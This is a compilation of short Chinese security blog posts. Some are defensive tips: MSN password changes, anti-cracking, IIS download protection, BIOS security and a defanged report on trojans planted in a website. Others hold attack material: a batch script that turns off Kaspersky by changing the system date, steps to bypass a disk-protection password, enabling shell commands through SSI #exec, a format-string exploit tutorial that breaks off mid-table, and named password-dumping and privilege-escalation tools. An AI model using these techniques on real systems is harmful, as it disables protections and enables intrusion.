系统安全技巧之如何对MSN密码进行修改

系统安全技巧之如何对MSN密码进行修改

作者：gz13538758790　来源：赛迪网IT博客

原来MSN的密码可以通过其主站直接修改，但由于某些合并的问题，所以他(MSN，LIVE)修改密码就更困难了。

下面提供了两种方法：

1.给你一个网站直接登录后，输入你的msn用户名和密码就可以修改了。

2.教你如何一步一步的进入MSN修改密码的提示框。

希望对大家有帮助。

1.直接登录：https://account.live.com/ (推荐)

2.通过MSN进入的详细办法：

登录http://www.msn.com/

在的图标下面是频道列表，再下面是MSN 服务里面有一项叫MSN 客户服务。点击后会弹出一个页面，在这个图标下面你会找到“重新设置密码”，页面会变成一个白色的问题和回答。这是一个MS解答用户的页面，在这个页面下边更改密码才是我们的需要的。

单击后会进入另一个问题就是更改密码。这样我们可以通过点击“1.登录帐户服务。”等待一会，输入你的用户名(Email)和密码就可以进入了。登录成功后点击更改密码就可以修改密码。

简单修改 关闭卡巴斯基所有监控与保护

作者：birdsky　来源：赛迪网IT博客

其实方法很简单，这也是许多国外杀毒软件所存在的共同问题，希望卡巴斯基公司的相关人士重视一下相关漏洞。

以下为代码，网民也可尝试自行将系统时间更改为1981.1.12，或其他非正确系统时间，卡巴斯基就会关闭所有监控，并停止保护。

@echo off

set date=%date%

date 1981-01-12

ping -n 45 localhost > nul

date %date%

通过设置解决金山词霸与卡巴斯基冲突

作者：xiabiliang　来源：赛迪网IT博客

卡巴斯基启动之后，再启动金山词霸(版本2005)，金山词霸会死掉。

解决方法是，在卡巴斯基设置中有“添加信任”控制，把金山词霸XDICT.EXE添加到信任进程中，然后重新启动。启动的时候还会不停的弹出“Buffer Overrun”报警, 你只需要添加到信任中去就可以了。

从根源下手 保护共享软件不被暴力破解

从根源下手 保护共享软件不被暴力破解
作者：陈洪　来源：赛迪网安全社区

在软件的破解方法里，“暴力破解”（俗称“暴破”）算得上最为普及且行之有效的方式了。经过“暴破”后的软件拥有授权版本才具备的所有功能。笔者也是一位软件开发者，对于这种盗窃“知识产权”的行为深恶痛绝，因此将一些个人的防“暴破”经验共享出来，与大家交流和学习。
一、认识“暴破”手段
首先探讨一下破解组织的“暴破”手段。无论是技术多么精湛的组织，他们都会遵守以下的基本步骤来完成“暴破”。
1．判断软件是否加“壳”。
2．运行“暴破”工具，显示软件的源程序。
3．进行软件源程序的分析，找到注册信息语句。
4．修改注册信息的源程序，让注册功能不再生效，或者让注册码显示出来。
从上面的步骤中不难看到，软件之所以被轻易地“暴破”，主要还是因为开发者粗心大意，或者编译技术不完善导致源程序存在诸多漏洞而造成的。只要开发者在编写源程序时设置多层障碍，便可以在一定程度上防止“暴破”（笔者并不敢夸下“海口”，说自己的方法可以完全杜绝“暴破”，但起码可以增强软件的注册保护性能）。
二、防止“暴破”的方法
给软件“加壳”和添加反跟踪代码
1．软件发布前需要将可执行程序进行“加壳”处理，使其他人无法直接修改源程序。“加壳”可以利用很多优秀的“加壳”工具，且最好采用两种以上的工具对程序进行“加壳”。此外，还应尽可能地利用这些工具提供的反跟踪功能。
小提示：
开发者最好是设计自己的“加壳”方法。如果采用现成的工具，建议不要选择流行的，因为这些工具已被广泛研究，有了通用的“脱壳”办法。
2．除了“加壳”处理外，最好在软件开发的过程中嵌入反跟踪代码，防止“暴破”工具找到软件的注册漏洞。
软件的反跟踪方式较多，比较常见的有利用花指令随机改变关键代码的内存地址。下面看一个例子。
程序最初的源代码如下：
start_:
xor eax,1
add eax,2
jmp label1
label1: xor eax,3
add eax,4
xor eax,5
end start_
先将源程序进行编译，然后用W32Dasm进行反汇编，得到的反汇编结果与源代码相同。接着我们将上述源程序作如下修改：
start_:
xor eax,1
add eax,2
jnz label1 \\注意这里，用两句条件跳转代替了：jmp label1
jz label1
db 0E8h \\注意这个无用的字节和源程序的区别
label1: xor eax,3
add eax,4
xor eax,5
end start_
再把源程序进行编译，然后用W32Dasm进行反汇编。由此得到如下结果：W32Dasm反汇编的结果和事先写的汇编指令不一样，从反汇编的结果中已经无法理解程序的“真实”功能了。这是因为上述改动在W32Dasm的反汇编工作中做了“错误指引”，从而使得它犯下错误。
增加注册认证算法的难度
注册认证部分的源程序是“破解组织”进行“暴破”的突破口，注册认证算法的难易度直接影响软件被“暴破”的几率。增加注册认证算法的难度可以从以下方面入手。
1．选择相对复杂的算法进行注册开发（现行的加密算法中可以选择RSA算法）。当然，最好的方法还是自己编写算法。如果采用一些常见的密码学的算法，这跟引狼入室没有多大的区别，毕竟这些常见的算法已经被“暴破”高手们研究透彻了，哪里还有安全可言，而采用自己设计的算法就不同了，人的思维有所区别，这就在很大程度上增加了破解的难度。
2．检查注册信息代码编写得越分散越好。如果将注册模块编写到一起，就好比将财宝放在保险箱里，虽然非常坚固难以打开，但对于开锁高手而言，一旦打开它，里面的财宝尽失。具体的操作方法是：软件在注册时，不要让其调用同一个函数或判断同一个全局标志。
3．在检查注册信息的时候插入大量的无用运算代码。这样做的目的是误导解密者，让他们以为找到了真正的破解方法，在尝试以后却发现无效。这好比战场上的士兵用“迷彩服”与稻草来伪装自己一样，敌人很难发现他们到底在哪里。
增加注册信息步骤
增加注册认证算法的难度后，还需要在注册信息的步骤上下功夫，以此巩固防“暴破”的城墙。
1．可以使用优秀的随机数算法来让软件的注册方式带有随机性。譬如，除了启动时检查注册码外，还可以在软件运行的某个时段随机检查注册码。
2．采用一机一码的保护方式。这样设计以后，一台计算机上的注册码就无法在另外一台计算机上使用，就像很多软件以机器码为基础生成注册码一样。
3．删除试用版的功能代码。如果试用版与正式版是分开的两个版本。在试用版中不要仅仅锁定相关的菜单，而是彻底删除相关的功能代码。
增强软件自身源程序的完整性
在共享软件的开发过程中，除了对局部的注册代码进行加强外，还必须要考虑软件本身程序的完整性。可以通过以下方面进行加强。
1．增加对软件自身的完整性检查。这包括对磁盘文件和内存映像的检查，防止有人未经允许修改程序以达到破解的目的。
2．隐藏注册信息代码。不要采用例如“IsLicensedVersion( )”和“key.dat”等常见的注册代码名称。另外所有与软件保护相关的字符串都不要以明文形式存放在可执行文件中，最好是动态生成。
3．尽可能少地给用户提示信息，因为这些蛛丝马迹都可能导致解密者直接深入到受保护的内核。可以设计软件为当检测到破解企图后，不立即给用户提示信息，而是在系统的某个地方做一个记号，经过一段时间后软件自动停止工作。
4．不要依赖于“GetLocalTime( )”和“GetSystemTime( )”这些常见的函数来获取系统时间，可以通过读取关键系统文件的修改时间来得到系统时间信息。
5．如果采用keyfile（钥匙文件）保护方式，则其尺寸不宜太小，可将其结构设计得比较复杂，在程序中不同的地方对keyfile的不同部分进行复杂的运算和检查。
小提示：
上面提到的一些信息语句是“暴破组织”最基本的突破点，如果在软件开发的过程中，非常显眼地给出了这些提示，无疑慢性自杀。对这些“暴破”高手来说，有了这些提示，软件必将毁灭性的打击。所以开发者必须慎重，不要犯下如此低级的错误。
共享软件的防“暴破”的确是一项复杂而艰巨的任务，我们需要对“暴破”者的思维模式进行细致的研究。先假设暴破者可能采用的“暴破”方法，然后对症下药，对某些薄弱环节进行加强。可以说“暴破”跟防“暴破”是一场智力游戏，就像“猫捉老鼠”一样，虽然“暴破”者无孔不入，但只要开发者采用的“防暴”方法得当，即可将他们拒之门外。

不用改文件名 防止IIS文件被下载方法
作者：smtk　来源：赛迪网安全社区

如何才能防止encry目录下的所有文件被非法下载呢？我们可以应用IIS中的应用程序映射结合ASP.NET中的IHttpHandler自定义权限，把IIS应用程序映射用于所有文件，并将控制权交给我们自己实现的IHttpHandler。

首先添加应用程序映射：打开IIS管理器-＞右击我们要控制下载的站点-＞在属性对话框中“配置...”，将文件改为你自己.netFramework ASPnet_isapi.dll的路径。

然后修改web.config，在system.web下添加httpHandlers项，

＜system.web＞
...
＜httpHandlers＞
＜add verb="*" path="encry/*.*" type="CustomHttpHandler.Class1,CustomHttpHandler"＞＜/add＞
＜/httpHandlers＞
...
＜/system.web＞

下面来实现IHttpHandler

//------------------------file:Class1.cs---------
using System;
using System.Web;
namespace CustomHttpHandler
{
/// ＜summary＞
/// Class1 的摘要说明。
/// ＜/summary＞
public class Class1 : System.Web.IHttpHandler
{
public Class1()
{
//
// TODO: 在此处添加构造函数逻辑
//
}
#region IHttpHandler 成员

public void ProcessRequest(HttpContext context)
{
// TODO: 添加 Class1.ProcessRequest 实现
// string strRefUrl=context.Request.ServerVariables["HTTP_REFERER"];
/*插入您自己的代码，读文件内容并填充Response，该例仅简单返回一条错误信息*/
context.Response.Write("您无法访问该页");
}

public bool IsReusable
{
get
{
// TODO: 添加 Class1.IsReusable getter 实现
return false;
}
}

#endregion
}
}

教你简单方法轻松破解超级保镖的密码
作者：smtk　来源：赛迪网安全社区

超级保镖从面市以来就受到了广大电脑爱好者的欢迎，它的磁盘保护功能是让人惊叹的，有一句话说的是“有利就有弊”，这么强大的功能一定也有弊的一面。
如果您忘记了超级保镖的系统管理员密码，那您就不能进入超级保镖的高级用户设置，更改超级保镖的系统设置了，后果就不用我多说了吧，您一定知道的！
我觉得超级保镖的密码是它最脆弱的一面，超级保镖的密码是保存在超级保镖所在的文件夹中的sysmode.ini文件。如果您是用记事本查看该文件内容，密码是被隐藏了的，能不能把密码读出来呢？小生才疏学浅没办法做到，但可以把它破解。其实，破解超级保镖的密码一点也不难，只要会操作电脑的人士都能做到。
密码破解方法如下：
首先，找到超级保镖所在的文件夹（超级保镖默认的文件夹名称为：SafeDisk）；
其次，找到超级保镖文件夹中的 sysmode.ini文件；
再次，将sysmode.ini删除，并重新启动计算机；
最后，进入Windows后，在Windows的系统栏点击"超级保镖"图标，进入高级用户设置，重新设定密码并保存就行了。
是不是很简单，希望我的这一招能对您有所帮助。

黑客案例——浏览器执行exe文件的探讨

黑客案例——浏览器执行exe文件的探讨

作者：hackmaster　来源：赛迪网安全社区

一：真的能在浏览器中执行命令文件吗？

答案是肯定的。不过先别高兴，只能执行服务器端的，而且是必须经过授权的。否则服务器想黑你就太容易了，谁敢看我我就格式化谁。

二：他是如何实现的。是靠asp文件吗？

在服务器端执行文件是靠SSI来实现的，SSI时服务器端包含的意思（不是SSL），我们经常使用的#include就是服务器端包含的指令之一。不过，这次要介绍的就是——#exec。就是他可以实现服务器端执行指令。

不过，这次他不能用于.asp的文件。而只能用.stm、.shtm 和 .shtml这些扩展名。而能解释执行他们的就是Ssinc.dll。所以，你写好的代码必须保存成.stm等格式才能确保服务器能执行。

三：如何执行呢？

终于开始讨论实质性问题了。

它的语法是：

CommandType是参数，他有两个可选类型：

1.CGI 运行一个应用程序

如 CGI 脚本、ASP 或 ISAPI 应用程序。

CommandDes cription 参数是一个字符串。此字符串包含应用程序的虚拟路径，后跟一个问号以及传送给应用程序的任一参数，参数之间由加号分隔(+)。

他可是#exec命令最有用的参数，也是#exec命令存在的大部分理由。他可以处理已授权的CGI脚本，或Isapi应用程序。微软为了向下兼容一些早期的ISAPI应用程序，而创建了该项命令。我们知道，微软早期的WEB应用程序都是靠ISAPI解释的，而且也兼容CGI程序。你现在也可以在你的WEB根目录中找到CGI-BIN的目录。

我们可以用一下例子说明。

这种命令我们在一些UNIX主机上可以经常见到。现在，我们也可以在自己的.shtml中运用他了。当然，如果服务器允许的话。

还有一种类型的程序：

这种命令方式将启动一个进程外的程序来解释并动态输出信息到网页上。这种方式不常见。但你仍然可以在一些网站中见到。

2.CMD参数

他可是#exec命令中最可怕的参数，也是#exec命令禁止使用的大部分理由。他也是我们一些网友实现最终幻想的利器。可惜，要得到我们幻想的招数有些困难，也几乎是不可能的。

以下是微软关于CMD参数的说明，你一定要读明白再试！

CMD 运行 shell 命令。 CommandDes cription 参数是一个字符串，其中包含 shell命令程序的完整物理路径，后跟由空格分隔的任何命令行参数。如果没有指定全路经，Web 服务器将搜索系统路径。默认情况下，该指令是被禁用的，这是因为它会对 Web站点造成安全方面的危险；例如，用户可能使用 format 命令格式化您的硬盘。

我本人建议关闭，因为现在微软也不推荐用这个命令。不过，如果你是服务器的管理员，可以试一试。

你可以新建一个test.shtml的文件，然后在首行设置一个命令。

[an error occurred while processing this directive]

'NT中的一个帮助文件（没有危险）。

或试一试！

[an error occurred while processing thisdirective]

'window98下的显示内存的一个命令。（没有危险）　　

　

然后你在该虚拟目录中将其权限设为脚本，或可执行。

最后，你可以在浏览器中输入该地址http://localhost/xxx/test.shtml如果你看到浏览器中显示了他们的屏幕输入信息。那么，恭喜你。你试成功了。

四：最终幻想

如果我们想执行多的命令呢？那么闭上眼，往下看吧。

首先，你打开注册表编辑器（记住要先备份），然后找

　　KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services　\W3SVC4　

　　'也可能是w3svc　 \Parameters

选择新建一个Dword值SSIEnableCmdDirective，它的两个值为0，1。下面是微软的说明。

服务器端的 #exec cmd 命令包括可执行外壳命令。安全意识强的站点希望通过将此值设置为 0 来关闭 #exec cmd命令，并以此作为外加的安全防范，尤其是在允许不受信任的使用者将文件放置到服务器时更是如此。默认状态下，注册表中不存在此值；要允许该命令执行外壳命令，必须先创建此值并将值设置为1。

还可以在添一个Dwordd值AllowSpecialCharsInShell它的两个值为0，1。下面是微软的说明。

范围：0，1 默认值：0 (禁用)

本值控制在运行批处理文件（ .bat 和 .cmd 文件）时，是否允许在命令行使用[ | ( , ; % ] 等 Cmd.exe特殊字符。这些特殊字符可能引发严重的安全隐患。如果该项值设置为 1，心怀叵测的用户可以在服务器上随意执行命令。因此，强力推荐用户保留其默认设置0。默认情况下，这些特殊字符不能传递到脚本映射 CGI 程序。如果设置为 1，除了管道符号 | 和标准 I/O 重定向符（）之外（这两类字符在命令处理器中具有特殊含义），这些特殊字符都能够传递到脚本映射 CGI 程序。

下面我就不详述了。不过你要执行一些你希望的命令可不是这么简单(如：[an error occurred while processing thisdirective])你不会成功的，如果死机不要怨我。

利用格式化字符串漏洞对系统发起攻击

作者：hackmaster　来源：赛迪网安全社区

【编者按：一个很小的疏忽，就会酿成危机系统安全的大患！】

什么是格式化字符串攻击？

格式化字符串漏洞同其他许多安全漏洞一样是由于程序员的懒惰造成的。当你正在阅读本文的时候，也许有个程序员正在编写代码，他的任务是：打印输出一个字符串或者把这个串拷贝到某缓冲区内。他可以写出如下的代码：

printf("%s", str);

但是为了节约时间和提高效率，并在源码中少输入6个字节，他会这样写：

printf(str);

为什么不呢？干嘛要和多余的printf参数打交道，干嘛要花时间分解那些愚蠢的格式？printf的第一个参数无论如何都会输出的！程序员在不知不觉中打开了一个安全漏洞，可以让攻击者控制程序的执行，这就是不能偷懒的原因所在。

为什么程序员写的是错误的呢？他传入了一个他想要逐字打印的字符串。实际上该字符串被printf函数解释为一个格式化字符串（format string）。函数在其中寻找特殊的格式字符比如"%d"。如果碰到格式字符，一个变量的参数值就从堆栈中取出。很明显，攻击者至少可以通过打印出堆栈中的这些值来偷看程序的内存。但是有些事情就不那么明显了，这个简单的错误允许向运行中程序的内存里写入任意值。

Printf中被忽略的东西

在说明如何为了自己的目的滥用printf之前，我们应该深入领会printf提供的特性。假定读者以前用过printf函数并且知道普通的格式化特性，比如如何打印整型和字符串，如何指定最大和最小字符串宽度等。除了这些普通的特性之外，还有一些深奥和鲜为人知的特性。在这些特性当中，下面介绍的对我们比较有用：

* 在格式化字符串中任何位置都可以得到输出字符的个数。当在格式化字符串中碰到"%n"的时候，在%n域之前输出的字符个数会保存到下一个参数里。例如，为了获取在两个格式化的数字之间空间的偏量：

int pos, x = 235, y = 93;

printf("%d %n%d\n", x, &pos, y);

printf("The offset was %d\n", pos);

* %n格式返回应该被输出的字符数目，而不是实际输出的字符数目。当把一个字符串格式化输出到一个定长缓冲区内时，输出字符串可能被截短。不考虑截短的影响，%n格式表示如果不被截短的偏量值（输出字符数目）。为了说明这一点，下面的代码会输出100而不是20：

char buf[20];

int pos, x = 0;

snprintf(buf, sizeof buf, "%.100d%n", x, &pos);

printf("position: %d\n", pos);

简单的例子

除了讨论抽象和复杂的理论，我们将会使用一个具体的例子来说明我们刚才讨论的原理。下面这个简单的程序能满足这个要求：

/*

* fmtme.c

* Format a value into a fixed-size buffer

*/

#include

int

main(int argc, char **argv)

{

char buf[100];

int x;

if(argc != 2)

exit(1);

x = 1;

snprintf(buf, sizeof buf, argv[1]);

buf[sizeof buf - 1] = 0;

printf("buffer (%d): %s\n", strlen(buf), buf);

printf("x is %d/%#x (@ %p)\n", x, x, &x);

return 0;

}

对这个程序有几点说明：第一，目的很简单：将一个通过命令行传递值格式化输出到一个定长的缓冲区里。并确保缓冲区的大小限制不被突破。在缓冲区格式化后，把它输出。除了把参数格式化，还设置了一个整型值随后输出。这个变量是随后我们攻击的目标。现在值得我们注意的是这个值应该始终为1。

本文中所有的例子都是在x86 BSD/OS 4.1机器上完成。如果你到莫桑比克执行任务超过20年时间可能会对x86不熟悉，这是一个little-endian机器。这决定在例子中多精度数字的表示方法。在这里使用的具体数值会因为系统的差异而不同，这些差异表现在不同体系结构、操作系统、环境甚至是命令行长度。经过简单调整，这些例子可以在其他x86平台上工作。通过努力也可以在其他体系结构的平台上工作。

用Format攻击

现在是我们戴上黑帽子开始以攻击者方式思考问题的时候了。我们现在手头有一个测试程序。知道这个程序有一个漏洞并且了解程序员是在哪里犯错误的（直接把用户输入的命令行参数作为snprintf的格式化参数）。我们还拥有关于printf函数深入的知识，知道如何运用这些知识。让我们开始修补我们的程序吧。

从简单的开始，我们通过简单的参数调用程序。看这儿：

% ./fmtme "hello world"

buffer (11): hello world

x is 1/0x1 (@ 0x804745c)

现在这儿还没有什么特别的事情发生。程序把我们输入的字符串格式化输出到缓冲区里，然后打印出它的长度和数值。程序还告诉我们变量x的值是1（以十进制和十六进制分别显示），x的存储地址是0x804745c。接下来我们试着使用一些格式指令。在下面的例子中我们打印出在格式化字符串之上栈堆中的整型数值：

% ./fmtme "%x %x %x %x"

buffer (15): 1 f31 1031 3133

x is 1/0x1 (@ 0x804745c)

对这个程序的快速分析可以揭示在调用snprintf函数时程序堆栈的规划：

Address Contents Description

fp+8 Buffer pointer 4-byte address

fp+12 Buffer length 4-byte integer

fp+16 &n

黑客攻击之用物理攻击来实现网络入侵

作者：许本新　来源：赛迪网安全社区

目前网络网络中最常用的攻击手段主要有以下几种：

1、社会工程学攻击

2、物理攻击

3、暴力攻击

4、利用Unicode漏洞攻击

5、利用缓冲区溢出漏洞进行攻击等技术。

在今天这篇文章中我将结合实际，介绍一些常用的的攻击工具的使用以及部分工具的代码实现。

下面首先给大家介绍一下社会工程学攻击，社会工程是使用计谋和假情报去获得密码和其他敏感信息的科学，研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体，因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。

举个例子：一组高中学生曾经想要进入一个当地的公司的计算机网络，他们拟定了一个表格，调查看上去显得是无害的个人信息，例如所有秘书和行政人员和他们的配偶、孩子的名字，这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统，因为网络上的大多数人是使用宠物和他们配偶名字作为密码。

一、社会工程学攻击

目前社会工程学攻击主要包括两种方式：打电话请求密码和伪造E-mail

1、打电话请求密码

尽管不像前面讨论的策略那样聪明，打电话寻问密码也经常奏效。在社会工程中那些黑客冒充失去密码的合法雇员，经常通过这种简单的方法重新获得密码。

2、伪造E-mail

使用telnet一个黑客可以截取任何一个身份证发送E-mail的全部信息，这样的Email消息是真的，因为它发自于一个合法的用户。在这种情形下这些信息显得是绝对的真实。黑客可以伪造这些。一个冒充系统管理员或经理的黑客就能较为轻松的获得大量的信息，黑客就能实施他们的恶意阴谋。

二、物理攻击之获取管理员密码

物理安全是保护一些比较重要的设备不被接触。物理安全比较难防，因为攻击者往往是来自能够接触到物理设备的用户。下面一案例来说明如何获得用户的管理员帐号。

如果你的电脑经常被别人接触，别人就有可能利用一些工具软件来获得你的管理员帐号，这样一来下次他就可以成功的登录你的计算机了。

一般来说我们自己使用的计算机的时候我们都是采用管理员登录的，而管理员帐号在登录后，所有的用户信息都存储在系统的一个进程中，这个进程是：“winlogon.exe”，物理攻击者就可以利用程序将当前登录用户的密码解码出来。

在这种情况下，如果你的计算机给别人使用的话，你虽然不安告诉别人你的计算机密码是多少，别人仍然可以使用软件解码出你的管理员的帐号和密码。比如说使用FindPass.exe如果是Windows Server 2003环境的话，还可以使用FindPass2003.exe等工具就可以对该进程进行解码，然后将当前用户的密码显示出来。具体使用的方法就是将FindPass.exe或者FindPass2003.exe拷贝到C盘根目录，在cmd下执行该程序，就可以获得当前用户得登录名。

所以在此告诫大家如果你的计算机中有非常重要的信息的话也不要轻易给别人使用，这也是很危险的。

三、物理攻击之提升用户权限

有时候，管理员为了安全，给其他用户建立一个普通用户帐号，认为这样就安全了。其实不然，用普通用户帐号登录后，可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。例如利用Hacker帐户登录系统，在系统中执行程序GetAdmin.exe，这样一来程序就会自动读取所有用户列表，在对话框中点击按钮“New”，在框中输入要新建的管理员组的用户名。

输入一个用户名“IAMHacker”，点击按钮“确定”以后，然后点击主窗口的按钮“OK”，出现添加成功的窗口。

危险无处不在 账号防盗防骗的小经验

危险无处不在　账号防盗防骗的小经验

作者：塞北|谷子熟了吗　来源：赛迪网安全社区

最近盗号很猖獗，大家一定要小心看管自己的账号!这里有一些小技巧希望大家能注意下。

1、公共场所上网、下机前，务必重起电脑

相信现在网吧电脑都100%安装了还原系统，重起电脑基本可以杜绝菜鸟级别的盗号手段。

2、上网过程中，坚决不打开别人发你的不明链接

记得有一次，正跟玩魔力的朋 友QQ聊天。他莫名其妙的让我去某网址看照片。我正犹豫的时候，他紧接着发过来一句“千万别开那网页，有病毒!我电脑已经感染了……”

上网，不要浏览乱七八糟的网站，尤其是现在的一些卖虚拟财产的网站，广告价格特别便宜，其实就是引人上当。如果你上网感觉不明原因的电脑运行慢了，立刻重起电脑。

3、不要随便陷入“网恋”

“网恋”骗号，损失的不只是物质财富，还有感情。网络，只是一个虚拟的世界，不要过于想入非非。账号尽量不要告诉别人，特别是异性，除非你绝对相信他!

4、账号、密码错位输入

比如你的账号是“ABcdEFG”，你输入的时候先输入“cd”，再用鼠标把光标移动盗最前面输入“AB”，再用鼠标把光标移动到最后输入“EFG”。这种方法可以让大多数木马失效。

BIOS控制：从底层保障计算机系统安全

作者：redking　来源：51CTO　

【编者按：保护计算机系统安全的方法有很多，软件层面的，硬件层面的；内部的防护，外部的保护。文中从计算机最底层的BIOS入手，提出一种新的防止计算机被非法使用的方法。特别是其对硬盘的防护上，与微软VISTA的某些功能有着异曲同工之处。希望这篇文章能对广大读者和研发人员有所启发，从完全不同的角度去思考如何加强计算机使用过程中的安全防护。】

纵观市场上的安全产品，从网络防火墙到各种网络加密、个人数字签证以及早期硬盘锁，均未能对个人计算机本身进行实质性的保护。这些安全机制大都基于这样一种原理：利用一个软件，输入一个特定的密码，经过验证后即可获得合法身份，从而实现各种操作，如购物、收发公文、浏览甚至修改机密数据。众所周知，这种基于纯密码的机制是很脆弱的，所以，许多关键行业和部门都采用了软、硬结合的方式，如设立各种Smart卡认证机制。在银行工作的职工，每人都有一张代表自己电子身份的IC卡，每天上班，必须先刷卡才能进入银行的业务系统。这种机制的安全性大大提高了，但对于个人或普通企业用计算机，这种机制成本太高。本文从BIOS工作原理出发，提出一种安全性高、全新的计算机安全保护机制。

一、原理

BIOS是计算机架构中最为底层的软件。在PC一加电时，首先执行的就是它，它负责对计算机进行自检和初始化，在检查PC各部件都正常后再由它引导操作系统，如DOS、Windows等。如果一台PC没有BIOS，即无法开机，成了废铁一堆。而且BIOS一般是不可以相互替代的，只有同一个厂家同一型号的主板，其BIOS才可以互换。本机制的基本原理就是将PC中的BIOS从主机中抽出，存到一个带加密的外部设备中，如USB钥匙盘等，没有该盘就不能开启计算机；又由于外部设备是加密的，即使有含BIOS的USB钥匙盘，但不知道密码也不能开机，从而实现计算机的保护。这种带加密的钥匙盘由于各自密码或加密算法不同，也避免了使用同型号BIOS进行开机的可能。

二、实现

BIOS储存在计算机主机板的一种IC芯片(通常是FLASH)中，它有两个主要的组成部分，即BootBlock段和主体BIOS。BootBlock段是不压缩的且存放于固定的地址空间，它是计算机开机时首先执行的部分。它主要负责对计算机硬件做最基本、最简单的初始化，而后解压缩主体BIOS的其他模块，并一一执行，其流程如图1所示。由于BootBlock的这一特点，无需将BootBlock段抽出至外部设备中，反而要利用它的初始化能力以启动与外部设备如USB盘的通信。但必须对BootBlock段加以修改，以实现对USB钥匙盘的解密、主体BIOS的读入过程，即在检查BIOS校验和之前，从键盘读取用户的密码，并将该密码通过一定的运算方法加密，并发往USB接口，在USB钥匙盘收到该密码后，允许内存的BIOS数据可读。

这样经过修改后，原主机板中存储BIOS的FLASH只存储修改过的BootBlock段代码，不再有主体BIOS。同时不再采用FLASH芯片，直接使用一次性写入的PROM，避免其他软件或病毒对该区域代码的修改。对于具体的加密算法和密码认证机制，不同的制造商可以选择不同的方式，如可以将主机板上具有惟一性的参数加入算法中，以实现一个主机板只有一套USB钥匙盘相对应，等等。

USB钥匙盘的实现，和市面上通常所说的软件狗，其原理是一样的，只是这里说的USB钥匙盘的储存容量要求相对大一些，至少要256KB以上。当然也可以不使用USB钥匙盘，而利用一些IC封装的CPU卡或SIM卡，做成LPT或COM接口的设备，如北京握奇公司就提供串行的SIM IC，只需要稍加点简单的电路就可以实现与COM口的通信。其原理和USB钥匙盘一样，只是使用的通信接口不同而已。

三、扩展

前面所说的机制已经可以实现计算机安全保护了，但为了增加实用性，还需要做一些简单的扩展，以提高破译的代价。

扩展一是使用IDE的安全特性。现代计算机BIOS都已经支持IDE加密(AMI和AWARD BIOS都有此功能)，在实际使用过程中可结合该功能。该功能是对IDE硬盘进行加密，在BIOS开机阶段要求输入正确的密码，否则该硬盘不可以使用。在没有通过密码验证的情况下，BIOS根本不能正确识别硬盘的设备类型，OS更不知道该硬盘的存在，也就无法使用或破坏硬盘中原有的数据。

扩展二是修改系统BIOS，在BIOS中将硬盘参数，如分区表等备份到USB钥匙盘。做过BIOS开发的工程师知道，系统开机时首先执行的是BIOS，系统关机时最后执行的也是BIOS(意外断电除外，无论是操作系统关机还是按Power Button关机，都有对应的SMI处理程序)。利用BIOS的这个特性，在每次开机时，BIOS负责从USB钥匙盘中读取硬盘参数并恢复到硬盘中，在关机前，BIOS将硬盘参数备份到USB钥匙盘，同时破坏掉硬盘中该区域的数据。这样，即使将该硬盘安装到别的系统中，没有对应的钥匙盘也不能使用。

这样就从底层保障计算机安全，从而实现禁止非法使用。

东方卫士被挂马 安全网站安全谁来保证

东方卫士被挂马 安全网站安全谁来保证

作者：T木　来源：赛迪网

【编者按：为安全起见，文中“http”均被替换为“hxxp”，“”均被替换为“[]”，特此说明。】

前两天有网友反映国内知名的安全网站东方卫士再次被挂载木马，这已经是东方卫士第二次暴露出存在安全隐患。

回顾

在此之前就曾发生过一次东方卫士网站首页（hxxp://www.i110.com）存在恶意代码引用的事件，如果用户没有安装过微软的MS07-004补丁程序，并且使用IE浏览器访问上述页面的话，就会感染木马病毒。

技术分析：

1. 东方卫士网站首页代码中，包含了一处对恶意网页的引用语句：

[iframe src=hxxp://***.ch/ook.html width=0 height=0][/iframe]

如图1：



图1

2.这个被引用的恶意网页中包含了利用MS07-004漏洞的代码，使得系统能够自动下载hxxp://***.ch/xia.exe（Trojan-Downloader.Win32.agent.ddz）到本地，并运行。

3.xia.exe是个木马下载器，该木马复制自身到%system32%目录下，命名为wdfmg1r32.exe，运行后下载灰鸽子病毒hxxp://***.li/2.exe（Backdoor.Win32.Hupigon.cpb）。

4.2.exe是灰鸽子病毒最新变种，采用RootKit技术编写，隐藏进程。它复制自身到%system32%目录下，命名为system32.exe，该病毒运行后会释放文件到 %WinDir%\svchost.exe，文件大小为381440字节，并创建下面服务：

服务名：Net work nois

服务描述：Net work nois

服务程序：C:\WINNT\svchost.exe

另外还会下载hxxp://lxn2wyf8899.3322.org/ip.txt到本地系统临时目录下。ip.txt包含的内容为：

hxxp://221.215.170.192:5600/wwwroot/（该IP对应地址为：山东省青岛市(李

沧区)网通ADSL）

染毒电脑将被黑客远程完全控制，这些操作可能是任意文件操作、注册表操作、键盘记录、下载执行远程程序、任意网络操作甚至远程开机摄像头监控等。

再次被挂马

而这一次，在东方卫士主页上，通过查看页面源代码，可以看到网页中被插入一条“[ iframe src=”指令，该指令将隐藏打开一个新的页面，这个页面伪造了浏览器无法开的错误网页，并在后台隐藏打开三个页面，进行木马下载。

打开的隐藏页面代码：

[iframe src=hxxp://www.****.cn/33/Reflector/index.htm width=0

height=0 frameborder=0][/iframe]

在打开的伪造错误页面中会打开三个网页：

[iframe src="hxxp://www.****.cn/33/Reflector/4.htm" width="0"

height="0" frameborder="0"][/iframe]

[iframe src="hxxp://www.****.cn/33/Reflector/2.htm" width="0" height="0" frameborder="0"]

[/iframe]

[iframe src="hxxp://www.*****.com/wm/20/5.htm" width="0" height="0" frameborder="0"]

[/iframe]

下载木马：

hxxp://www.****.cn/33/Reflector/1.exe（无效）

hxxp://www.*****.com/0.exe



图2



图3

再一却又再二，是否还会再三再四

我们常说“再一再二，不可再三再四”。作为防护先锋的安全网站，其在用户心目中的可信度、影响度都是极高的，他们任何一次疏忽所带来的危害性都远大于木马病毒自身所造成的破坏。第一次发生网站被挂载木马的事件后，相信东方卫士应该已经采取了相应的措施。但挂马事件却能够再次发生，这就需要引起我们的警惕与反思了。

再次挂马，说明在“矛”与“盾”的斗争中，“矛”又一次的占据了上风。同时，东方卫士网站一而的再被挂马，除了系统自身依然存在尚未发现的漏洞外，其在自身网站的安全监控上也应当还存在着一定的、可被利用的缺陷。

